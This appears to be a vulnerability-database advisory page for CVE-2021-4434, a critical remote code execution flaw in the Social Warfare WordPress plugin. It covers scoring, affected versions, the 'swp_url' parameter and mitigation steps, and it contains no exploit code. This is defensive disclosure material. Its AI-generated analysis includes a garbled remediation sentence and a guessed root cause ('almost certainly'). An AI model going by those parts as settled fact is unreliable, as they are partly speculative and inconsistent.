What is the CVSS score of CVE-2021-4434?

CVE-2021-4434 has a CVSS 3.1 base score of 10.0 (Critical). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H. EPSS exploitation probability: 8.0%.

Which versions of Social Warfare are affected by CVE-2021-4434?

The Social Warfare WordPress plugin (versions ≤ 3.5.2) contains a critical remote code execution vulnerability (CVSS 10.0) that unauthenticated attackers can exploit to execute arbitrary server code.

Is there a public PoC exploit available for CVE-2021-4434?

Yes, a public proof-of-concept exploit is available for CVE-2021-4434. Prioritise patching immediately. EPSS: 8.0%.

How to fix or mitigate CVE-2021-4434?

24 hours: Audit all WordPress installations to identify active use of Social Warfare plugin versions ≤ 3.5.2 and immediately deactivate and remove if present. 7 days: Migrate social sharing functionality to a maintained alternative plugin (e.g., Jetpack Social, Social Snap) or disable the feature entirely. 30 days: Implement WordPress plugin inventory management and automated detection for abandoned/unmaintained plugins; review web server and WAF logs from the past 90 days for exploitation attempts targeting this vulnerability.

Social Warfare CVE-2021-4434

CRITICAL

Code Injection (CWE-94)

2024-01-17 security@wordfence.com

RCE Code Injection WordPress Social Warfare

10.0

CVSS 3.1 · NVD

Severity by source

NVD PRIMARY

10.0 CRITICAL

AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Attack Vector

Network

Attack Complexity

Low

Privileges Required

None

User Interaction

None

Scope

Changed

Confidentiality

High

Integrity

High

Availability

High

Lifecycle Timeline

PoC Detected

Apr 08, 2026 - 18:17 vuln.today

Public exploit code

CVE Published

Jan 17, 2024 - 09:15 nvd

CRITICAL 10.0

DescriptionCVE.org

The Social Warfare plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 3.5.2 via the 'swp_url' parameter. This allows attackers to execute code on the server.

AnalysisAI

Remote code execution in the Social Warfare WordPress plugin (versions ≤ 3.5.2) allows unauthenticated attackers to run arbitrary code on the server via the 'swp_url' parameter. Publicly available exploit code exists and the issue carries a maximum CVSS 10.0 with scope change, while the EPSS score of 7.99% (92nd percentile) signals meaningfully elevated exploitation interest. The flaw was reported by Wordfence and primarily threatens WordPress sites still running this abandoned/legacy plugin version.

Technical ContextAI

Social Warfare is a popular social-sharing plugin for WordPress published by warfareplugins. The CPE cpe:2.3:a:warfareplugins:social_warfare confirms the affected product line and the wordpress target platform. The root cause maps to CWE-94 (Improper Control of Generation of Code, i.e., Code Injection): the plugin processes the 'swp_url' parameter in a way that allows attacker-supplied content to be interpreted and executed as code on the server, almost certainly by fetching a remote payload and evaluating it within the PHP runtime. Because WordPress plugins run with full PHP privileges of the web server, code injection inside the plugin translates directly into arbitrary command execution in the WordPress context.

RemediationAI

Upgrade the Social Warfare plugin to a version newer than 3.5.2 as published on the WordPress plugin repository; the input data does not specify an exact fix version, so Patch available per vendor advisory and administrators should verify the latest release directly from warfareplugins before deploying. If immediate upgrade is not possible, deactivate and remove the Social Warfare plugin entirely, which eliminates the vulnerable code path at the cost of losing social-sharing widgets on the site. As a temporary compensating control, use a WAF or web server rule (ModSecurity, Wordfence, Cloudflare) to block requests containing the 'swp_url' parameter to plugin endpoints, accepting that this may break legitimate plugin functionality, and restrict administrative and plugin endpoints by IP where feasible to reduce exposure until the plugin is updated or removed.

CVE-2021-4434 vulnerability details – vuln.today

Back

Social Warfare CVE-2021-4434

Severity by source

CVSS VectorNVD

Lifecycle Timeline

DescriptionCVE.org

AnalysisAI

Technical ContextAI

RemediationAI

Share

External POC / Exploit Code